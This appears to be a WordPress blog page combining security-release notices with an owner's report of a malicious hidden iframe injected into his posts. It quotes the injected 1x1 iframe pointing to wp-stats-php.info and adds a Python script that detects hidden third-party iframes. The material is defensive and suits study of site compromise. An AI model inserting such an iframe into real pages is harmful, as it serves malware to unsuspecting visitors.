Oh no, not again! Well, better upgrade soon or risk losing your blog. Thanks WordPress. Keep the upgrades coming. :)

Version 2.5.1 of WordPress is now available. It includes a number of bug fixes, performance enhancements, and one very important security fix. We recommend everyone update immediately, particularly if your blog has open registration. The vulnerability is not public but it will be shortly.

In addition to the security fix, 2.5.1 contains many bug fixes. If you are interested only in the security fixes, you can download these corrected copies of wp-includes/pluggable.php, wp-admin/includes/media.php, and wp-admin/media.php. Replace your existing copies of these files with these new copies.

If you download the entire 2.5.1 release, you will be getting over 70 other fixes. 2.5.1 focuses on fixing the most annoying bugs and improving performance. Here are some highlights:

  • Performance improvements for the Dashboard, Write Post, and Edit Comments pages.
  • Better performance for those who have many categories
  • Media Uploader fixes
  • An upgrade to TinyMCE 3.0.7
  • Widget Administration fixes
  • Various usability improvements
  • Layout fixes for IE


Today I did a Google search for Richard Palace and, to my surprise, I found that my site, RichardPalace.com, has been identified as containing malicious software. Immediately, I checked with the NoScript add-on for Firefox and discovered a domain which was rather unfamiliar. The domain is wp-stats-php.info, and I thought the site was related to WordPress correcting some stats, but it was not. I then checked my site's source code for the domain name wp-stats-php and found the following code:

<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

This code was inserted on my blog post on 11th Nov 2007 by someone or some software. I immediately removed it and asked Google to review my site so as to remove the “This site may harm your computer” tag. I am not sure how this iframe code got into my blog. If it happens to me, it can also happen to you.

If you are using WordPress, I suggest you do the following:
1) Upgrade WordPress to the latest version.
2) Change your theme.
3) Check your site source code regularly for “iframe”.
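
One way to automate step 3, as an added example that is not part of the original post: a small Python auditor that flags iframes which are invisible (1x1 or hidden by style) or load from a host the site does not embed on purpose. The allow-list, the sample page and the function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Hosts the owner embeds on purpose (assumption; adjust per site).
ALLOWED_HOSTS = {"www.youtube.com", "player.vimeo.com"}
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

# Constructed sample: one legitimate embed plus the iframe quoted in the post.
SAMPLE = """<p>Post body</p>
<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>
<!-- Traffic Statistics --> <iframe src="http://www.wp-stats-php.info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
"""

def _pixels(value):
    # Integer pixel size, or None for missing or percentage values.
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return int(m.group(1)) if m else None

class IframeAuditor(HTMLParser):
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # (line, host, reasons)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if host and host != self.site_host and host not in ALLOWED_HOSTS:
            reasons.append("third-party host")
        sizes = [_pixels(a.get("width")), _pixels(a.get("height"))]
        if any(s is not None and s <= 1 for s in sizes):
            reasons.append("invisible size")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")
        if reasons:
            self.findings.append((self.getpos()[0], host, reasons))

def audit_html(html, site_host):
    # Return every suspicious iframe found in one page or post body.
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return auditor.findings

if __name__ == "__main__":
    print(audit_html(SAMPLE, "richardpalace.com"))
```

Run it over both the rendered pages and the stored post content, since the iframe described above was sitting inside a post rather than in the theme.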


WordPress 2.3.3 is an urgent security release. If you have registration enabled, a flaw was found in the XML-RPC implementation such that a specially crafted request would allow a user to edit posts of other users on that blog. In addition to fixing this security flaw, 2.3.3 fixes a few minor bugs. If you are interested only in the security fix, download the fixed version of xmlrpc.php and copy it over your existing xmlrpc.php. Otherwise, you can get the entire release here.

Also, there is a vulnerability in the WP-Forum plugin that is being actively exploited right now. If you are using this plugin, please remove it until an update is available from its author.

Since we are talking security, remember to use strong passwords and change them regularly. While you’re updating WP and your plugins, consider refreshing your passwords.
